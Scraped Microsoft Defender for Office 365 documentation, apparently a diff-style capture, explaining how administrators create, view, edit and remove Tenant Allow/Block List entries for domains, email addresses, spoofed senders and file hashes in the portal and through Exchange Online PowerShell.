-> By default, allow entries for domains and email addresses exist for 30 days. During those 30 days, Microsoft learns from the allow entries and [removes them or automatically extends them](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447). After Microsoft learns from the removed allow entries, messages that contain those entities are delivered, unless something else in the message is detected as malicious.
->
-> During mail flow, if messages containing the allowed entity pass other checks in the filtering stack, the messages will be delivered. For example, if a message passes [email authentication checks](email-authentication-about.md), URL filtering, and file filtering, the message is delivered if it's also from an allowed sender.
-
-### Create block entries for domains and email addresses
-
-To create block entries for *domains and email addresses*, use either of the following methods:
--- From the **Emails** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=email>. When you submit a message as **Should have been blocked (False negative)**, you can select **Block all emails from this sender or domain** to add a block entry to the **Domains & email addresses** tab on the **Tenant Allow/Block Lists** page. For instructions, see [Report questionable email to Microsoft](submissions-admin.md#report-questionable-email-to-microsoft).--- From the **Domains & addresses** tab on the **Tenant Allow/Block Lists** page or in PowerShell as described in this section.-
-To create block entries for *spoofed senders*, see [this section](#create-block-entries-for-spoofed-senders) later in this article.
-
-Email from these blocked senders is marked as *high confidence phishing* and quarantined.
-
-> [!NOTE]
-> Currently, subdomains of the specified domain aren't blocked. For example, if you create a block entry for email from contoso.com, mail from marketing.contoso.com isn't also blocked. You need to create a separate block entry for marketing.contoso.com.
->
-> Users in the organization also can't *send* email to these blocked domains and addresses. The message is returned in the following non-delivery report (also known as an NDR or bounce message): `550 5.7.703 Your message can't be delivered because messages to XXX, YYY are blocked by your organization using Tenant Allow Block List.` The entire message is blocked for all internal and external recipients of the message, even if only one recipient email address or domain is defined in a block entry.
-
-#### Use the Microsoft Defender portal to create block entries for domains and email addresses in the Tenant Allow/Block List
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. On the **Tenant Allow/Block Lists** page, verify that the **Domains & addresses** tab is selected.
-
-3. On the **Domains & addresses** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Block**.
-
-4. In the **Block domains & addresses** flyout that opens, configure the following settings:
-
- - **Domains & addresses**: Enter one email address or domain per line, up to a maximum of 20.
-
- - **Remove block entry after**: Select from the following values:
- - **1 day**
- - **7 days**
- - **30 days** (default)
- - **Never expire**
- - **Specific date**: The maximum value is 90 days from today.
-
- - **Optional note**: Enter descriptive text for why you're blocking the email addresses or domains.
-
-5. When you're finished in the **Block domains & addresses** flyout, select **Add**.
-
-Back on the **Domains & email addresses** tab, the entry is listed.
-
-##### Use PowerShell to create block entries for domains and email addresses in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-New-TenantAllowBlockListItems -ListType Sender -Block -Entries "DomainOrEmailAddress1","DomainOrEmailAddress1",..."DomainOrEmailAddressN" <-ExpirationDate Date | -NoExpiration> [-Notes <String>]
-```
-
-This example adds a block entry for the specified email address that expires on a specific date.
-
-```powershell
-New-TenantAllowBlockListItems -ListType Sender -Block -Entries "test@badattackerdomain.com","test2@anotherattackerdomain.com" -ExpirationDate 8/20/2022
-```
-
-For detailed syntax and parameter information, see [New-TenantAllowBlockListItems](/powershell/module/exchange/new-tenantallowblocklistitems).
-
-### Use the Microsoft Defender portal to view entries for domains and email addresses in the Tenant Allow/Block List
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Tenant Allow/Block Lists** in the **Rules** section. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-Verify the **Domains & addresses** tab is selected.
-
-On the **Domains & addresses** tab, you can sort the entries by clicking on an available column header. The following columns are available:
--- **Value**: The domain or email address.-- **Action**: The value **Allow** or **Block**.-- **Modified by**-- **Last updated**-- **Remove on**: The expiration date.-- **Notes**-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Action**: The values are **Allow** and **Block**.-- **Never expire**: :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: or :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::-- **Last updated**: Select **From** and **To** dates.-- **Remove on**: Select **From** and **To** dates.-
-When you're finished in the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific entries.
-
-To group the entries, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select **Action**. To ungroup the entries, select **None**.
-
-#### Use PowerShell to view entries for domains and email addresses in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Get-TenantAllowBlockListItems -ListType Sender [-Allow] [-Block] [-Entry <Domain or Email address value>] [<-ExpirationDate Date | -NoExpiration>]
-```
-
-This example returns all allow and block entries for domains and email addresses.
-
-```powershell
-Get-TenantAllowBlockListItems -ListType Sender
-```
-
-This example filters the results for block entries for domains and email addresses.
-
-```powershell
-Get-TenantAllowBlockListItems -ListType Sender -Block
-```
-
-For detailed syntax and parameter information, see [Get-TenantAllowBlockListItems](/powershell/module/exchange/get-tenantallowblocklistitems).
-
-### Use the Microsoft Defender portal to modify entries for domains and email addresses in the Tenant Allow/Block List
-
-In existing domain and email address entries, you can change the expiration date and note.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. Verify the **Domains & addresses** tab is selected.
-
-3. On the **Domains & addresses** tab, select the entry from the list by selecting the check box next to the first column, and then select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.
-
-4. In the **Edit domains & addresses** flyout that opens, the following settings are available:
- - **Block entries**:
- - **Remove block entry after**: Select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Never expire**
- - **Specific date**: The maximum value is 90 days from today.
- - **Optional note**
- - **Allow entries**:
- - **Remove allow entry after**: Select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Specific date**: The maximum value is 30 days from today.
- - **Optional note**
-
- When you're finished in the **Edit domains & addresses** flyout, select **Save**.
-
-> [!TIP]
-> In the details flyout of an entry on the **Domains & addresses** tab, use :::image type="icon" source="../../media/m365-cc-sc-view-submission-icon.png" border="false"::: **View submission** at the top of the flyout to go to the details of the corresponding entry on the **Submissions** page. This action is available if a submission was responsible for creating the entry in the Tenant Allow/Block List.
-
-#### Use PowerShell to modify entries for domains and email addresses in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Set-TenantAllowBlockListItems -ListType Sender <-Ids <Identity value> | -Entries <Value>> [<-ExpirationDate Date | -NoExpiration>] [-Notes <String>]
-```
-
-This example changes the expiration date of the specified block entry for the sender email address.
-
-```powershell
-Set-TenantAllowBlockListItems -ListType Sender -Entries "julia@fabrikam.com" -ExpirationDate "9/1/2022"
-```
-
-For detailed syntax and parameter information, see [Set-TenantAllowBlockListItems](/powershell/module/exchange/set-tenantallowblocklistitems).
-
-### Use the Microsoft Defender portal to remove entries for domains and email addresses from the Tenant Allow/Block List
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. Verify the **Domains & addresses** tab is selected.
-
-3. On **Domains & addresses** tab, do one of the following steps:
-
- - Select the entry from the list by selecting the check box next to the first column, and then select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.
- - Select the entry from the list by clicking anywhere in the row other than the check box. In the details flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** at the top of the flyout.
-
- > [!TIP]
- > - To see details about other entries without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
- > - You can select multiple entries by selecting each check box, or select all entries by selecting the check box next to the **Value** column header.
-
-4. In the warning dialog that opens, select **Delete**.
-
-Back on the **Domains & addresses** tab, the entry is no longer listed.
-
-#### Use PowerShell to remove entries for domains and email addresses from the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Remove-TenantAllowBlockListItems -ListType Sender `<-Ids <Identity value> | -Entries <Value>>
-```
-
-This example removes the specified entry for domains and email addresses from the Tenant Allow/Block List.
-
-```powershell
-Remove-TenantAllowBlockListItems -ListType Sender -Entries "adatum.com"
-```
-
-For detailed syntax and parameter information, see [Remove-TenantAllowBlockListItems](/powershell/module/exchange/remove-tenantallowblocklistitems).
-
-## Spoofed senders in the Tenant Allow/Block List
-
-When you override the verdict in the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md), the spoofed sender becomes a manual allow or block entry that only appears on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page.
-
-### Create allow entries for spoofed senders
-
-To create allow entries for *spoofed senders*, use any of the following methods:
--- From the **Emails** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=email>. For instructions, see [Submit good email to Microsoft](submissions-admin.md#report-good-email-to-microsoft).
- - When you submit a message that was detected and blocked by [spoof intelligence](anti-spoofing-spoof-intelligence.md), an allow entry for the spoofed sender is added to the **Spoofed senders** tab in the Tenant Allow/Block List.
- - If the sender wasn't detected and blocked by spoof intelligence, submitting the message to Microsoft doesn't create an allow entry for the sender in the Tenant Allow/Block List.
-- From the **Spoof intelligence insight** page at <https://security.microsoft.com/spoofintelligence> *if* the sender was detected and blocked by spoof intelligence. For instructions, see [Override the spoof intelligence verdict](anti-spoofing-spoof-intelligence.md#override-the-spoof-intelligence-verdict).
- - When you override the verdict in the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md), the spoofed sender becomes a manual entry that appears only on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page.
-- From the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page or in PowerShell as described in this section.-
-> [!NOTE]
-> Allow entries for spoofed senders account for intra-org, cross-org, and DMARC spoofing.
->
-> Only the combination of the spoofed user *and* the sending infrastructure as defined in the [domain pair](#domain-pair-syntax-for-spoofed-sender-entries) is allowed to spoof.
->
-> Allow entries for spoofed senders never expire.
-
-#### Use the Microsoft Defender portal to create allow entries for spoofed senders in the Tenant Allow/Block List
-
-In the Tenant Allow/Block List, you can create allow entries for spoofed senders before they're detected and blocked by [spoof intelligence](anti-spoofing-spoof-intelligence.md).
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. On the **Tenant Allow/Block Lists** page, select the **Spoofed senders** tab.
-
-3. On the **Spoofed senders** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add**.
-
-4. In the **Add new domain pairs** flyout that opens, configure the following settings:
-
- - **Add domain pairs with wildcards**: Enter domain pair per line, up to a maximum of 20. For details about the syntax for spoofed sender entries, see the [Domain pair syntax for spoofed sender entries](#domain-pair-syntax-for-spoofed-sender-entries) section later in this article.
-
- - **Spoof type**: Select one of the following values:
- - **Internal**: The spoofed sender is in a domain that belongs to your organization (an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains)).
- - **External**: The spoofed sender is in an external domain.
-
- - **Action**: Select **Allow** or **Block**.
-
- When you're finished in the **Add new domain pairs** flyout, select **Add**.
-
-Back on the **Spoofed senders** tab, the entry is listed.
-
-##### Use PowerShell to create allow entries for spoofed senders in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-New-TenantAllowBlockListSpoofItems -Identity Default -Action Allow -SpoofedUser <Domain | EmailAddress> -SendingInfrastructure <Domain | IPAddress/24> -SpoofType <External | Internal>
-```
-
-This example creates an allow entry for the sender bob@contoso.com from the source contoso.com.
-
-```powershell
-New-TenantAllowBlockListSpoofItems -Identity Default -Action Allow -SendingInfrastructure contoso.com -SpoofedUser bob@contoso.com -SpoofType External
-```
-
-For detailed syntax and parameter information, see [New-TenantAllowBlockListSpoofItems](/powershell/module/exchange/new-tenantallowblocklistspoofitems).
-
-### Create block entries for spoofed senders
-
-To create block entries for *spoofed senders*, use any of the following methods:
--- From the **Emails** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=email>. For instructions, see [Report questionable email to Microsoft](submissions-admin.md#report-questionable-email-to-microsoft).-- From the **Spoof intelligence insight** page at <https://security.microsoft.com/spoofintelligence> *if* the sender was detected and allowed by spoof intelligence. For instructions, see [Override the spoof intelligence verdict](anti-spoofing-spoof-intelligence.md#override-the-spoof-intelligence-verdict).
- - When you override the verdict in the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md), the spoofed sender becomes a manual entry that appears only on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page.
-- From the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page or in PowerShell as described in this section.-
-> [!NOTE]
->
-> Only the combination of the spoofed user *and* the sending infrastructure defined in the [domain pair](#domain-pair-syntax-for-spoofed-sender-entries) is blocked from spoofing.
->
-> Email from these senders is marked as *phishing*. What happens to the messages is determined by the [anti-spam policy](anti-spam-policies-configure.md) that detected the message for the recipient. For more information, see the **Phishing** detection action in [EOP anti-spam policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-spam-policy-settings).
->
-> When you configure a block entry for a domain pair, the spoofed sender becomes a manual block entry that appears only on the **Spoofed senders** tab in the Tenant Allow/Block List.
->
-> Block entries for spoofed senders never expire.
-
-#### Use the Microsoft Defender portal to create block entries for spoofed senders in the Tenant Allow/Block List
-
-The steps are nearly identical to [creating allow entries for spoofed senders](#use-the-microsoft-defender-portal-to-create-allow-entries-for-spoofed-senders-in-the-tenant-allowblock-list) as previously described in this article.
-
-The only difference is: for the **Action** value in Step 4, select **Block** instead of **Allow**.
-
-##### Use PowerShell to create block entries for spoofed senders in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-New-TenantAllowBlockListSpoofItems -Identity Default -Action Block -SpoofedUser <Domain | EmailAddress> -SendingInfrastructure <Domain | IPAddress/24> -SpoofType <External | Internal>
-```
-
-This example creates a block entry for the sender laura@adatum.com from the source 172.17.17.17/24.
-
-```powershell
-New-TenantAllowBlockListSpoofItems -Identity Default -Action Block -SendingInfrastructure 172.17.17.17/24 -SpoofedUser laura@adatum.com -SpoofType External
-```
-
-For detailed syntax and parameter information, see [New-TenantAllowBlockListSpoofItems](/powershell/module/exchange/new-tenantallowblocklistspoofitems).
-
-### Use the Microsoft Defender portal to view entries for spoofed senders in the Tenant Allow/Block List
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Tenant Allow/Block Lists** in the **Rules** section. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-Verify the **Spoofed senders** tab is selected.
-
-On the **Spoofed senders** tab, you can sort the entries by clicking on an available column header. The following columns are available:
--- **Spoofed user**-- **Sending infrastructure**-- **Spoof type**: The available values are **Internal** or **External**.-- **Action**: The available values are **Block** or **Allow**.-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Action**: The available values are **Allow** and **Block**.-- **Spoof type**: The available values are **Internal** and **External**.-
-When you're finished in the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific entries.
-
-To group the entries, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select one of the following values:
--- **Action**-- **Spoof type**-
-To ungroup the entries, select **None**.
-
-#### Use PowerShell to view entries for spoofed senders in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Get-TenantAllowBlockListSpoofItems [-Action <Allow | Block>] [-SpoofType <External | Internal>
-```
-
-This example returns all spoofed sender entries in the Tenant Allow/Block List.
-
-```powershell
-Get-TenantAllowBlockListSpoofItems
-```
-
-This example returns all allow spoofed sender entries that are internal.
-
-```powershell
-Get-TenantAllowBlockListSpoofItems -Action Allow -SpoofType Internal
-```
-
-This example returns all blocked spoofed sender entries that are external.
-
-```powershell
-Get-TenantAllowBlockListSpoofItems -Action Block -SpoofType External
-```
-
-For detailed syntax and parameter information, see [Get-TenantAllowBlockListSpoofItems](/powershell/module/exchange/get-tenantallowblocklistspoofitems).
-
-### Use the Microsoft Defender portal to modify entries for spoofed senders in the Tenant Allow/Block List
-
-When you modify an allow or block entry for spoofed senders in the Tenant Allow/Block list, you can only change the entry from **Allow** to **Block**, or vice-versa.
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. Select the **Spoofed senders** tab.
-
-3. Select the entry from the list by selecting the check box next to the first column, and then select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.
-
-4. In the **Edit spoofed sender** flyout that opens, select **Allow** or **Block**, and then select **Save**.
-
-#### Use PowerShell to modify entries for spoofed senders in the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Set-TenantAllowBlockListSpoofItems -Identity Default -Ids <Identity value> -Action <Allow | Block>
-```
-
-This example changes the specified spoofed sender entry from an allow entry to a block entry.
-
-```powershell
-Set-TenantAllowBlockListItems -Identity Default -Ids 3429424b-781a-53c3-17f9-c0b5faa02847 -Action Block
-```
-
-For detailed syntax and parameter information, see [Set-TenantAllowBlockListSpoofItems](/powershell/module/exchange/set-tenantallowblocklistspoofitems).
-
-### Use the Microsoft Defender portal to remove entries for spoofed senders from the Tenant Allow/Block List
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. Select the **Spoofed senders** tab.
-
-3. On the **Spoofed senders** tab, select the entry from the list by selecting the check box next to the first column, and then select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.
-
- > [!TIP]
- > You can select multiple entries by selecting each check box, or select all entries by selecting the check box next to the **Spoofed user** column header.
-
-4. In the warning dialog that opens, select **Delete**.
-
-#### Use PowerShell to remove entries for spoofed senders from the Tenant Allow/Block List
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Remove-TenantAllowBlockListSpoofItems -Identity domain.com\Default -Ids <Identity value>
-```
-
-```powershell
-Remove-TenantAllowBlockListSpoofItems -Identity domain.com\Default -Ids d86b3b4b-e751-a8eb-88cc-fe1e33ce3d0c
-```
-
-This example removes the specified spoofed sender. You get the Ids parameter value from the Identity property in the output of Get-TenantAllowBlockListSpoofItems command.
-
-For detailed syntax and parameter information, see [Remove-TenantAllowBlockListSpoofItems](/powershell/module/exchange/remove-tenantallowblocklistspoofitems).
-
-### Domain pair syntax for spoofed sender entries
-
-A domain pair for a spoofed sender in the Tenant Allow/Block List uses the following syntax: `<Spoofed user>, <Sending infrastructure>`.
--- **Spoofed user**: This value involves the email address of the spoofed user that's displayed in the **From** box in email clients. This address is also known as the `5322.From` or P2 sender address. Valid values include:
- - An individual email address (for example, chris@contoso.com).
- - An email domain (for example, contoso.com).
- - The wildcard character (\*).
--- **Sending infrastructure**: This value indicates the source of messages from the spoofed user. Valid values include:
- - The domain found in a reverse DNS lookup (PTR record) of the source email server's IP address (for example, fabrikam.com).
- - If the source IP address has no PTR record, then the sending infrastructure is identified as \<source IP\>/24 (for example, 192.168.100.100/24).
- - A verified DKIM domain.
- - The wildcard character (\*).
-
-Here are some examples of valid domain pairs to identify spoofed senders:
--- `contoso.com, 192.168.100.100/24`-- `chris@contoso.com, fabrikam.com`-- `*, contoso.net`-
-> [!NOTE]
-> You can specify wildcards in the sending infrastructure or in the spoofed user, but not in both at the same time. For example, `*, *` isn't permitted.
->
-> If you're using a domain instead of the IP address or IP address range in the sending infrastructure, the domain needs to match the PTR record for the connecting IP in the **Authentication-Results** header. You can determine the PTR by running the command: `ping -a <IP address>`. We also recommend using the PTR Organization Domain as the domain value. For example, if the PTR resolves to "smtp.inbound.contoso.com", you should use "contoso.com" as the sending infrastructure.
-
-Adding a domain pair allows or blocks the *combination* of the spoofed user *and* the sending infrastructure *only*. For example, you add an allow entry for the following domain pair:
--- **Domain**: gmail.com-- **Sending infrastructure**: tms.mx.com-
-Only messages from that domain *and* sending infrastructure pair are allowed to spoof. Other senders attempting to spoof gmail.com aren't allowed. Messages from senders in other domains originating from tms.mx.com are checked by spoof intelligence.
-
-## About impersonated domains or senders
-
-You can't create allow entries in the Tenant Allow/Block List for messages that were detected as [impersonated users or impersonated domains by anti-phishing policies in Defender for Office 365](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
-
-Submitting a message that was incorrectly blocked as impersonation on the **Emails** tab of the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=email> doesn't add the sender or domain as an allow entry in the Tenant Allow/Block List.
-
-Instead, the domain or sender is added to the **Trusted senders and domains** section in the [anti-phishing policy](anti-phishing-policies-mdo-configure.md#use-the-microsoft-defender-portal-to-modify-anti-phishing-policies) that detected the message.
-
-For submission instructions for impersonation false positives, see [Report good email to Microsoft](submissions-admin.md#report-good-email-to-microsoft).
-
-> [!NOTE]
-> Currently, User (or graph) Impersonation isn't taken care of from here.
-
-## Related articles
--- [Use the Submissions page to submit suspected spam, phish, URLs, legitimate email getting blocked, and email attachments to Microsoft](submissions-admin.md)-- [Report false positives and false negatives](submissions-outlook-report-messages.md)-- [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md)-- [Allow or block files in the Tenant Allow/Block List](tenant-allow-block-list-files-configure.md)-- [Allow or block URLs in the Tenant Allow/Block List](tenant-allow-block-list-urls-configure.md)
security Tenant Allow Block List Files Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/tenant-allow-block-list-files-configure.md
- Title: Allow or block files using the Tenant Allow/Block List
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier1
-description: Admins can learn how to allow or block files in the Tenant Allow/Block List.
- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Allow or block files using the Tenant Allow/Block List
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, admins can create and manage entries for files in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
-This article describes how admins can manage entries for files in the Microsoft Defender portal and in Exchange Online PowerShell.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>. To go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- You specify files by using the SHA256 hash value of the file. To find the SHA256 hash value of a file in Windows, run the following command in a Command Prompt:-
- ```DOS
- certutil.exe -hashfile "<Path>\<Filename>" SHA256
- ```
-
- An example value is `768a813668695ef2483b2bde7cf5d1b2db0423a0d3e63e498f3ab6f2eb13ea3a`. Perceptual hash (pHash) values aren't supported.
--- Entry limits for files:
- - **Exchange Online Protection**: The maximum number of allow entries is 500, and the maximum number of block entries is 500 (1000 file entries in total).
- - **Defender for Office 365 Plan 1**: The maximum number of allow entries is 1000, and the maximum number of block entries is 1000 (2000 file entries in total).
- - **Defender for Office 365 Plan 2**: The maximum number of allow entries is 5000, and the maximum number of block entries is 10000 (15000 file entries in total).
--- You can enter a maximum of 64 characters in a file entry.--- An entry should be active within 5 minutes.--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Detection tuning (manage)** or **Authorization and settings/Security settings/Core security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Add and remove entries from the Tenant Allow/Block List_: Membership in one of the following role groups:
- - **Organization Management** or **Security Administrator** (Security admin role).
- - **Security Operator** (Tenant AllowBlockList Manager).
- - _Read-only access to the Tenant Allow/Block List_: Membership in one of the following role groups:
- - **Global Reader**
- - **Security Reader**
- - **View-Only Configuration**
- - **View-Only Organization Management**
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- A **Files** tab is available on the **Submissions** page only in organizations with Microsoft Defender XDR or Microsoft Defender for Endpoint Plan 2. For information and instructions to submit files from the **Files** tab, see [Submit files in Microsoft Defender for Endpoint](../defender-endpoint/admin-submissions-mde.md).-
-## Create allow entries for files
-
-You can't create allow entries for files directly in the Tenant Allow/Block List. Unnecessary allow entries expose your organization to malicious email that would have been filtered by the system.
-
-Instead, you use the **Email attachments** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=emailAttachment>. When you submit a blocked file as **Should not have been blocked (False positive)**, you can select **Allow this file** to add an allow entry for the file on the **Files** tab on the **Tenant Allow/Block Lists** page. For instructions, see [Submit good email attachments to Microsoft](submissions-admin.md#report-good-email-attachments-to-microsoft).
-
-> [!NOTE]
-> Allow entries are added based on the filters that determined the message was malicious during mail flow. For example, if the sender email address and a file in the message were determined to be bad, an allow entry is created for the sender (email address or domain) and the file.
->
-> When the entity in the allow entry is encountered again (during mail flow or at time of click), all filters associated with that entity are overridden.
->
-> By default, allow entries for files exist for 30 days. During those 30 days, Microsoft learns from the allow entries and [removes them or automatically extends them](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/automatic-tenant-allow-block-list-expiration-management-is-now/ba-p/3723447). After Microsoft learns from the removed allow entries, messages that contain those entities are delivered, unless something else in the message is detected as malicious.
->
-> During mail flow, if messages containing the allowed entity pass other checks in the filtering stack, the messages are delivered. For example, if a message passes [email authentication checks](email-authentication-about.md), the message is delivered if it also contains an allowed file.
->
-> During time of click, the file allow entry overrides all filters associated with the file entity, which allows users to access the file.
-
-## Create block entries for files
-
-Email messages that contain these blocked files are blocked as *malware*. Messages that contain the blocked files are quarantined.
-
-To create block entries for files, use either of the following methods:
--- From the **Email attachments** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=emailAttachment>. When you submit a file as **Should have been blocked (False negative)**, you can select **Block this file** to add a block entry to the **Files** tab on the **Tenant Allow/Block Lists** page. For instructions, see [Report questionable email attachments to Microsoft](submissions-admin.md#report-questionable-email-attachments-to-microsoft).--- From the **Files** tab on the **Tenant Allow/Block Lists** page or in PowerShell as described in this section.-
-### Use the Microsoft Defender portal to create block entries for files in the Tenant Allow/Block List
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Policies & rules** \> **Threat Policies** \> **Rules** section \> **Tenant Allow/Block Lists**. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. On the **Tenant Allow/Block Lists** page, select the **Files** tab.
-
-3. On the **Files** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Block**.
-
-4. In the **Block files** flyout that opens, configure the following settings:
-
- - **Add file hashes**: Enter one SHA256 hash value per line, up to a maximum of 20.
-
- - **Remove block entry after**: Select from the following values:
- - **1 day**
- - **7 days**
